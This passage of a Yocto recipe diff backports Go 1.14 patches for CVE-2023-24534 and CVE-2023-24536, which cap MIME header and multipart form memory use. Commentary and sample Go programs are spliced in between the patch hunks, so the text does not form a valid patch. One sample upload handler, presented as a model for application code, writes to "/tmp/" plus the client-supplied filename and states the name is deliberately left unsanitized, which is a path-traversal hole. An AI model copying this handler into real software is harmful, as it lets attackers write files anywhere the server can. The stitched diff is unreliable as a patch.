++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ test.f(fw)
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(&buf, fw.Boundary())
++ _, err := fr.ReadForm(0)
++ if err != ErrMessageTooLarge {
++ t.Errorf("fr.ReadForm() = %v, want ErrMessageTooLarge", err)
++ }
++ })
++ }
++}
++
++// TestReadForm_ManyFiles_Combined tests that a multipart form containing many files only
++// results in a single on-disk file.
++func TestReadForm_ManyFiles_Combined(t *testing.T) {
++ const distinct = false
++ testReadFormManyFiles(t, distinct)
++}
++
++// TestReadForm_ManyFiles_Distinct tests that setting GODEBUG=multipartfiles=distinct
++// results in every file in a multipart form being placed in a distinct on-disk file.
++func TestReadForm_ManyFiles_Distinct(t *testing.T) {
++ t.Setenv("GODEBUG", "multipartfiles=distinct")
++ const distinct = true
++ testReadFormManyFiles(t, distinct)
++}
++
++func testReadFormManyFiles(t *testing.T, distinct bool) {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ const numFiles = 10
++ for i := 0; i < numFiles; i++ {
++ name := fmt.Sprint(i)
++ w, err := fw.CreateFormFile(name, name)
++ if err != nil {
++ t.Fatal(err)
++ }
++ w.Write([]byte(name))
++ }
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(&buf, fw.Boundary())
++ fr.tempDir = t.TempDir()
++ form, err := fr.ReadForm(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ for i := 0; i < numFiles; i++ {
++ name := fmt.Sprint(i)
++ if got := len(form.File[name]); got != 1 {
++ t.Fatalf("form.File[%q] has %v entries, want 1", name, got)
++ }
++ fh := form.File[name][0]
++ file, err := fh.Open()
++ if err != nil {
++ t.Fatalf("form.File[%q].Open() = %v", name, err)
++ }
++ if distinct {
++ if _, ok := file.(*os.File); !ok {
++ t.Fatalf("form.File[%q].Open: %T, want *os.File", name, file)
++ }
++ }
++ got, err := io.ReadAll(file)
++ file.Close()
++ if string(got) != name || err != nil {
++ t.Fatalf("read form.File[%q]: %q, %v; want %q, nil", name, string(got), err, name)
++ }
++ }
++ dir, err := os.Open(fr.tempDir)
++ if err != nil {
++ t.Fatal(err)
++ }
++ defer dir.Close()
++ names, err := dir.Readdirnames(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ wantNames := 1
++ if distinct {
++ wantNames = numFiles
++ }
++ if len(names) != wantNames {
++ t.Fatalf("temp dir contains %v files; want 1", len(names))
++ }
++ if err := form.RemoveAll(); err != nil {
++ t.Fatalf("form.RemoveAll() = %v", err)
++ }
++ names, err = dir.Readdirnames(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ if len(names) != 0 {
++ t.Fatalf("temp dir contains %v files; want 0", len(names))
++ }
++}
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 1750300..958cef8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -121,12 +121,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ return n, r.err
+ }
+
+-func newPart(mr *Reader, rawPart bool) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ bp := &Part{
+ Header: make(map[string][]string),
+ mr: mr,
+ }
+- if err := bp.populateHeaders(); err != nil {
++ if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
+ return nil, err
+ }
+ bp.r = partReader{bp}
+@@ -142,12 +142,16 @@ func newPart(mr *Reader, rawPart bool) (*Part, error) {
+ return bp, nil
+ }
+
+-func (bp *Part) populateHeaders() error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
+ r := textproto.NewReader(bp.mr.bufReader)
+- header, err := r.ReadMIMEHeader()
++ header, err := readMIMEHeader(r, maxMIMEHeaderSize)
+ if err == nil {
+ bp.Header = header
+ }
++ // TODO: Add a distinguishable error to net/textproto.
++ if err != nil && err.Error() == "message too large" {
++ err = ErrMessageTooLarge
++ }
+ return err
+ }
+
+@@ -287,6 +291,7 @@ func (p *Part) Close() error {
+ // isn't supported.
+ type Reader struct {
+ bufReader *bufio.Reader
++ tempDir string // used in tests
+
+ currentPart *Part
+ partsRead int
+@@ -297,6 +302,10 @@ type Reader struct {
+ dashBoundary []byte // "--boundary"
+ }
+
++// maxMIMEHeaderSize is the maximum size of a MIME header we will parse,
++// including header keys, values, and map overhead.
++const maxMIMEHeaderSize = 10 << 20
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -304,7 +313,7 @@ type Reader struct {
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+- return r.nextPart(false)
++ return r.nextPart(false, maxMIMEHeaderSize)
+ }
+
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -313,10 +322,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+- return r.nextPart(true)
++ return r.nextPart(true, maxMIMEHeaderSize)
+ }
+
+-func (r *Reader) nextPart(rawPart bool) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ if r.currentPart != nil {
+ r.currentPart.Close()
+ }
+@@ -341,7 +350,7 @@ func (r *Reader) nextPart(rawPart bool) (*Part, error) {
+
+ if r.isBoundaryDelimiterLine(line) {
+ r.partsRead++
+- bp, err := newPart(r, rawPart)
++ bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
+ if err != nil {
+ return nil, err
+ }
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+new file mode 100644
+index 0000000..6836928
+--- /dev/null
++++ b/src/mime/multipart/readmimeheader.go
+@@ -0,0 +1,14 @@
++// Copyright 2023 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++package multipart
++
++import (
++ "net/textproto"
++ _ "unsafe" // for go:linkname
++)
++
++// readMIMEHeader is defined in package net/textproto.
++//
++//go:linkname readMIMEHeader net/textproto.readMIMEHeader
++func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 94133ee..170d3f5 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -962,7 +962,7 @@ func testMissingFile(t *testing.T, req *Request) {
+ t.Errorf("FormFile file = %v, want nil", f)
+ }
+ if fh != nil {
+- t.Errorf("FormFile file header = %q, want nil", fh)
++ t.Errorf("FormFile file header = %v, want nil", fh)
+ }
+ if err != ErrMissingFile {
+ t.Errorf("FormFile err = %q, want ErrMissingFile", err)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index f63f5ec..96553fb 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -7,9 +7,11 @@ package textproto
+ import (
+ "bufio"
+ "bytes"
++ "errors"
+ "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "strconv"
+ "strings"
+ "sync"
+@@ -482,6 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ // }
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
++ return readMIMEHeader(r, math.MaxInt64)
++}
++
++// readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
++// It is called by the mime/multipart package.
++func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ // Avoid lots of small slice allocations later by allocating one
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+@@ -525,6 +533,15 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ continue
+ }
+
++ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
++ //
++ // value is computed as
++ // value := string(bytes.TrimLeft(v, " \t"))
++ //
++ // in the original patch from 1.19. This relies on
++ // 'v' which does not exist in 1.14. We leave the
++ // 1.14 method unchanged.
++
+ // Skip initial spaces in value.
+ i++ // skip colon
+ for i < len(kv) && (kv[i] == ' ' || kv[i] == '\t') {
+@@ -533,6 +550,16 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ value := string(kv[i:])
+
+ vv := m[key]
++ if vv == nil {
++ lim -= int64(len(key))
++ lim -= 100 // map entry overhead
++ }
++ lim -= int64(len(value))
++ if lim < 0 {
++ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
++ // to allow mime/multipart to detect it.
++ return m, errors.New("message too large")
++ }
+ if vv == nil && len(strs) > 0 {
+ // More than likely this will be a single-element key.
+ // Most headers aren't multi-valued.
+--
+2.25.1
+
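
Two consequences of this patch are worth noting for application code built against the patched go-1.14: file parts that exceed maxMemory now share a single temporary file, so FileHeader.Open may return a section reader rather than an *os.File, and the old one-file-per-part behaviour is only available via GODEBUG=multipartfiles=distinct. A sketch of a handler that copies through the multipart.File interface instead of type-asserting; the path, limit, and route are placeholders, and the destination filename is deliberately left unsanitized:

package main

import (
	"io"
	"log"
	"net/http"
	"os"
)

func save(w http.ResponseWriter, r *http.Request) {
	if err := r.ParseMultipartForm(8 << 20); err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	f, fh, err := r.FormFile("upload")
	if err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	defer f.Close()
	// Don't assume f.(*os.File): with the shared temp file it may be a
	// section reader. Copy via the interface instead.
	dst, err := os.Create("/tmp/" + fh.Filename) // placeholder path
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	defer dst.Close()
	if _, err := io.Copy(dst, f); err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
	}
}

func main() {
	// GODEBUG=multipartfiles=distinct restores one temp file per part.
	http.HandleFunc("/save", save)
	log.Fatal(http.ListenAndServe("127.0.0.1:8080", nil))
}
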
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
new file mode 100644
index 0000000000..d50db04bed
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
@@ -0,0 +1,200 @@
+From d6759e7a059f4208f07aa781402841d7ddaaef96 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 10 Mar 2023 14:21:05 -0800
+Subject: [PATCH] [release-branch.go1.19] net/textproto: avoid overpredicting
+ the number of MIME header keys
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802452
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+(cherry picked from commit f739f080a72fd5b06d35c8e244165159645e2ed6)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802393
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: I675451438d619a9130360c56daf529559004903f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481982
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d6759e7a059f4208f07aa781402841d7ddaaef96]
+CVE: CVE-2023-24534
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/bytes/bytes.go | 13 +++++++
+ src/net/textproto/reader.go | 31 +++++++++++------
+ src/net/textproto/reader_test.go | 59 ++++++++++++++++++++++++++++++++
+ 3 files changed, 92 insertions(+), 11 deletions(-)
+
+diff --git a/src/bytes/bytes.go b/src/bytes/bytes.go
+index e872cc2..1f0d760 100644
+--- a/src/bytes/bytes.go
++++ b/src/bytes/bytes.go
+@@ -1078,6 +1078,19 @@ func Index(s, sep []byte) int {
+ return -1
+ }
+
++// Cut slices s around the first instance of sep,
++// returning the text before and after sep.
++// The found result reports whether sep appears in s.
++// If sep does not appear in s, cut returns s, nil, false.
++//
++// Cut returns slices of the original slice s, not copies.
++func Cut(s, sep []byte) (before, after []byte, found bool) {
++ if i := Index(s, sep); i >= 0 {
++ return s[:i], s[i+len(sep):], true
++ }
++ return s, nil, false
++}
++
+ func indexRabinKarp(s, sep []byte) int {
+ // Rabin-Karp search
+ hashsep, pow := hashStr(sep)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index a505da9..8d547fe 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -486,8 +487,11 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+ var strs []string
+- hint := r.upcomingHeaderNewlines()
++ hint := r.upcomingHeaderKeys()
+ if hint > 0 {
++ if hint > 1000 {
++ hint = 1000 // set a cap to avoid overallocation
++ }
+ strs = make([]string, hint)
+ }
+
+@@ -562,9 +566,11 @@ func mustHaveFieldNameColon(line []byte) error {
+ return nil
+ }
+
+-// upcomingHeaderNewlines returns an approximation of the number of newlines
++var nl = []byte("\n")
++
++// upcomingHeaderKeys returns an approximation of the number of keys
+ // that will be in this header. If it gets confused, it returns 0.
+-func (r *Reader) upcomingHeaderNewlines() (n int) {
++func (r *Reader) upcomingHeaderKeys() (n int) {
+ // Try to determine the 'hint' size.
+ r.R.Peek(1) // force a buffer load if empty
+ s := r.R.Buffered()
+@@ -572,17 +578,20 @@ func (r *Reader) upcomingHeaderNewlines() (n int) {
+ return
+ }
+ peek, _ := r.R.Peek(s)
+- for len(peek) > 0 {
+- i := bytes.IndexByte(peek, '\n')
+- if i < 3 {
+- // Not present (-1) or found within the next few bytes,
+- // implying we're at the end ("\r\n\r\n" or "\n\n")
+- return
++ for len(peek) > 0 && n < 1000 {
++ var line []byte
++ line, peek, _ = bytes.Cut(peek, nl)
++ if len(line) == 0 || (len(line) == 1 && line[0] == '\r') {
++ // Blank line separating headers from the body.
++ break
++ }
++ if line[0] == ' ' || line[0] == '\t' {
++ // Folded continuation of the previous line.
++ continue
+ }
+ n++
+- peek = peek[i+1:]
+ }
+- return
++ return n
+ }
+
+ // CanonicalMIMEHeaderKey returns the canonical format of the
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3124d43..3ae0de1 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -9,6 +9,7 @@ import (
+ "bytes"
+ "io"
+ "reflect"
++ "runtime"
+ "strings"
+ "testing"
+ )
+@@ -127,6 +128,42 @@ func TestReadMIMEHeaderSingle(t *testing.T) {
+ }
+ }
+
++// TestReaderUpcomingHeaderKeys is testing an internal function, but it's very
++// difficult to test well via the external API.
++func TestReaderUpcomingHeaderKeys(t *testing.T) {
++ for _, test := range []struct {
++ input string
++ want int
++ }{{
++ input: "",
++ want: 0,
++ }, {
++ input: "A: v",
++ want: 1,
++ }, {
++ input: "A: v\r\nB: v\r\n",
++ want: 2,
++ }, {
++ input: "A: v\nB: v\n",
++ want: 2,
++ }, {
++ input: "A: v\r\n continued\r\n still continued\r\nB: v\r\n\r\n",
++ want: 2,
++ }, {
++ input: "A: v\r\n\r\nB: v\r\nC: v\r\n",
++ want: 1,
++ }, {
++ input: "A: v" + strings.Repeat("\n", 1000),
++ want: 1,
++ }} {
++ r := reader(test.input)
++ got := r.upcomingHeaderKeys()
++ if test.want != got {
++ t.Fatalf("upcomingHeaderKeys(%q): %v; want %v", test.input, got, test.want)
++ }
++ }
++}
++
+ func TestReadMIMEHeaderNoKey(t *testing.T) {
+ r := reader(": bar\ntest-1: 1\n\n")
+ m, err := r.ReadMIMEHeader()
+@@ -223,6 +260,28 @@ func TestReadMIMEHeaderTrimContinued(t *testing.T) {
+ }
+ }
+
++// Test that reading a header doesn't overallocate. Issue 58975.
++func TestReadMIMEHeaderAllocations(t *testing.T) {
++ var totalAlloc uint64
++ const count = 200
++ for i := 0; i < count; i++ {
++ r := reader("A: b\r\n\r\n" + strings.Repeat("\n", 4096))
++ var m1, m2 runtime.MemStats
++ runtime.ReadMemStats(&m1)
++ _, err := r.ReadMIMEHeader()
++ if err != nil {
++ t.Fatalf("ReadMIMEHeader: %v", err)
++ }
++ runtime.ReadMemStats(&m2)
++ totalAlloc += m2.TotalAlloc - m1.TotalAlloc
++ }
++ // 32k is large and we actually allocate substantially less,
++ // but prior to the fix for #58975 we allocated ~400k in this case.
++ if got, want := totalAlloc/count, uint64(32768); got > want {
++ t.Fatalf("ReadMIMEHeader allocated %v bytes, want < %v", got, want)
++ }
++}
++
+ type readResponseTest struct {
+ in string
+ inCode int
+--
+2.25.1
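
Besides the hint cap, the backport adds a minimal bytes.Cut (available upstream since Go 1.18) so upcomingHeaderKeys can walk the buffered header block one line at a time. A short stand-alone sketch of the same line-counting loop; it is simplified and does not skip folded continuation lines the way the real function does:

package main

import (
	"bytes"
	"fmt"
)

func main() {
	peek := []byte("Host: example.com\r\nAccept: */*\r\n\r\nbody")
	nl := []byte("\n")
	// Count header lines the way upcomingHeaderKeys does: cut off one line
	// at a time and stop at the blank line separating headers from the body.
	n := 0
	for len(peek) > 0 {
		var line []byte
		line, peek, _ = bytes.Cut(peek, nl)
		if len(line) == 0 || (len(line) == 1 && line[0] == '\r') {
			break
		}
		n++
	}
	fmt.Println("approximate header keys:", n) // 2
}
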
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
new file mode 100644
index 0000000000..39e1304fbd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
@@ -0,0 +1,134 @@
+From ef41a4e2face45e580c5836eaebd51629fc23f15 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 14:18:04 -0700
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: avoid excessive copy
+ buffer allocations in ReadForm
+
+When copying form data to disk with io.Copy,
+allocate only one copy buffer and reuse it rather than
+creating two buffers per file (one from io.multiReader.WriteTo,
+and a second one from os.File.ReadFrom).
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802453
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802395
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ie405470c92abffed3356913b37d813e982c96c8b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481983
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ef41a4e2face45e580c5836eaebd51629fc23f15]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 15 +++++++--
+ src/mime/multipart/formdata_test.go | 49 +++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+), 3 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index a7d4ca97f0484..975dcb6b26db4 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -84,6 +84,7 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ maxMemoryBytes = math.MaxInt64
+ }
+ }
++ var copyBuf []byte
+ for {
+ p, err := r.nextPart(false, maxMemoryBytes)
+ if err == io.EOF {
+@@ -147,14 +148,22 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ }
+ numDiskFiles++
+- size, err := io.Copy(file, io.MultiReader(&b, p))
++ if _, err := file.Write(b.Bytes()); err != nil {
++ return nil, err
++ }
++ if copyBuf == nil {
++ copyBuf = make([]byte, 32*1024) // same buffer size as io.Copy uses
++ }
++ // os.File.ReadFrom will allocate its own copy buffer if we let io.Copy use it.
++ type writerOnly struct{ io.Writer }
++ remainingSize, err := io.CopyBuffer(writerOnly{file}, p, copyBuf)
+ if err != nil {
+ return nil, err
+ }
+ fh.tmpfile = file.Name()
+- fh.Size = size
++ fh.Size = int64(b.Len()) + remainingSize
+ fh.tmpoff = fileOff
+- fileOff += size
++ fileOff += fh.Size
+ if !combineFiles {
+ if err := file.Close(); err != nil {
+ return nil, err
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 5cded7170c6b8..f5b56083b2377 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -368,3 +368,52 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ t.Fatalf("temp dir contains %v files; want 0", len(names))
+ }
+ }
++
++func BenchmarkReadForm(b *testing.B) {
++ for _, test := range []struct {
++ name string
++ form func(fw *Writer, count int)
++ }{{
++ name: "fields",
++ form: func(fw *Writer, count int) {
++ for i := 0; i < count; i++ {
++ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ },
++ }, {
++ name: "files",
++ form: func(fw *Writer, count int) {
++ for i := 0; i < count; i++ {
++ w, _ := fw.CreateFormFile(fmt.Sprintf("field%v", i), fmt.Sprintf("file%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ },
++ }} {
++ b.Run(test.name, func(b *testing.B) {
++ for _, maxMemory := range []int64{
++ 0,
++ 1 << 20,
++ } {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ test.form(fw, 10)
++ if err := fw.Close(); err != nil {
++ b.Fatal(err)
++ }
++ b.Run(fmt.Sprintf("maxMemory=%v", maxMemory), func(b *testing.B) {
++ b.ReportAllocs()
++ for i := 0; i < b.N; i++ {
++ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++ form, err := fr.ReadForm(maxMemory)
++ if err != nil {
++ b.Fatal(err)
++ }
++ form.RemoveAll()
++ }
++
++ })
++ }
++ })
++ }
++}
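
The buffer-reuse change above works by pairing io.CopyBuffer with a writer-only wrapper: hiding *os.File's ReadFrom method forces the copy through the caller's 32 KiB buffer instead of letting the file allocate its own. The same trick in isolation; the temp-file name and data are placeholders:

package main

import (
	"io"
	"io/ioutil"
	"log"
	"os"
	"strings"
)

// writerOnly hides any ReadFrom method on the destination so io.CopyBuffer
// cannot bypass the caller-supplied buffer.
type writerOnly struct{ io.Writer }

func main() {
	dst, err := ioutil.TempFile("", "copybuf-demo-")
	if err != nil {
		log.Fatal(err)
	}
	defer os.Remove(dst.Name())
	defer dst.Close()

	// LimitReader also hides strings.Reader's WriteTo, so the buffer below
	// is genuinely exercised rather than skipped by a fast path.
	src := io.LimitReader(strings.NewReader(strings.Repeat("x", 1<<20)), 1<<20)

	buf := make([]byte, 32*1024) // one reusable buffer, as in readForm
	n, err := io.CopyBuffer(writerOnly{dst}, src, buf)
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("copied %d bytes through a single reusable buffer", n)
}
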
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
new file mode 100644
index 0000000000..9ba5114c82
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
@@ -0,0 +1,184 @@
+From 7a359a651c7ebdb29e0a1c03102fce793e9f58f0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 16 Mar 2023 16:56:12 -0700
+Subject: [PATCH] [release-branch.go1.19] net/textproto, mime/multipart:
+ improve accounting of non-file data
+
+For requests containing large numbers of small parts,
+memory consumption of a parsed form could be about 250%
+over the estimated size.
+
+When considering the size of parsed forms, account for the size of
+FileHeader structs and increase the estimate of memory consumed by
+map entries.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+For CVE-2023-24536
+For #59153
+For #59269
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802454
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802396
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: I31bc50e9346b4eee6fbe51a18c3c57230cc066db
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481984
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/7a359a651c7ebdb29e0a1c03102fce793e9f58f0]
+CVE: CVE-2023-24536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 9 +++--
+ src/mime/multipart/formdata_test.go | 55 ++++++++++++-----------------
+ src/net/textproto/reader.go | 8 ++++-
+ 3 files changed, 37 insertions(+), 35 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 975dcb6b26db4..3f6ff697ca608 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -103,8 +103,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ // Multiple values for the same key (one map entry, longer slice) are cheaper
+ // than the same number of values for different keys (many map entries), but
+ // using a consistent per-value cost for overhead is simpler.
++ const mapEntryOverhead = 200
+ maxMemoryBytes -= int64(len(name))
+- maxMemoryBytes -= 100 // map overhead
++ maxMemoryBytes -= mapEntryOverhead
+ if maxMemoryBytes < 0 {
+ // We can't actually take this path, since nextPart would already have
+ // rejected the MIME headers for being too large. Check anyway.
+@@ -128,7 +129,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ // file, store in memory or on disk
++ const fileHeaderSize = 100
+ maxMemoryBytes -= mimeHeaderSize(p.Header)
++ maxMemoryBytes -= mapEntryOverhead
++ maxMemoryBytes -= fileHeaderSize
+ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
+@@ -183,9 +187,10 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++ size = 400
+ for k, vs := range h {
+ size += int64(len(k))
+- size += 100 // map entry overhead
++ size += 200 // map entry overhead
+ for _, v := range vs {
+ size += int64(len(v))
+ }
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index f5b56083b2377..8ed26e0c34081 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -192,10 +192,10 @@ func (r *failOnReadAfterErrorReader) Read(p []byte) (n int, err error) {
+ // TestReadForm_NonFileMaxMemory asserts that the ReadForm maxMemory limit is applied
+ // while processing non-file form data as well as file form data.
+ func TestReadForm_NonFileMaxMemory(t *testing.T) {
+- n := 10<<20 + 25
+ if testing.Short() {
+- n = 10<<10 + 25
++ t.Skip("skipping in -short mode")
+ }
++ n := 10 << 20
+ largeTextValue := strings.Repeat("1", n)
+ message := `--MyBoundary
+ Content-Disposition: form-data; name="largetext"
+@@ -203,38 +203,29 @@ Content-Disposition: form-data; name="largetext"
+ ` + largeTextValue + `
+ --MyBoundary--
+ `
+-
+ testBody := strings.ReplaceAll(message, "\n", "\r\n")
+- testCases := []struct {
+- name string
+- maxMemory int64
+- err error
+- }{
+- {"smaller", 50 + int64(len("largetext")) + 100, nil},
+- {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+- {"too-large", 0, ErrMessageTooLarge},
+- }
+- for _, tc := range testCases {
+- t.Run(tc.name, func(t *testing.T) {
+- if tc.maxMemory == 0 && testing.Short() {
+- t.Skip("skipping in -short mode")
+- }
+- b := strings.NewReader(testBody)
+- r := NewReader(b, boundary)
+- f, err := r.ReadForm(tc.maxMemory)
+- if err == nil {
+- defer f.RemoveAll()
+- }
+- if tc.err != err {
+- t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+- }
+- if err == nil {
+- if g := f.Value["largetext"][0]; g != largeTextValue {
+- t.Errorf("largetext mismatch: got size: %v, expected size: %v", len(g), len(largeTextValue))
+- }
+- }
+- })
++ // Try parsing the form with increasing maxMemory values.
++ // Changes in how we account for non-file form data may cause the exact point
++ // where we change from rejecting the form as too large to accepting it to vary,
++ // but we should see both successes and failures.
++ const failWhenMaxMemoryLessThan = 128
++ for maxMemory := int64(0); maxMemory < failWhenMaxMemoryLessThan*2; maxMemory += 16 {
++ b := strings.NewReader(testBody)
++ r := NewReader(b, boundary)
++ f, err := r.ReadForm(maxMemory)
++ if err != nil {
++ continue
++ }
++ if g := f.Value["largetext"][0]; g != largeTextValue {
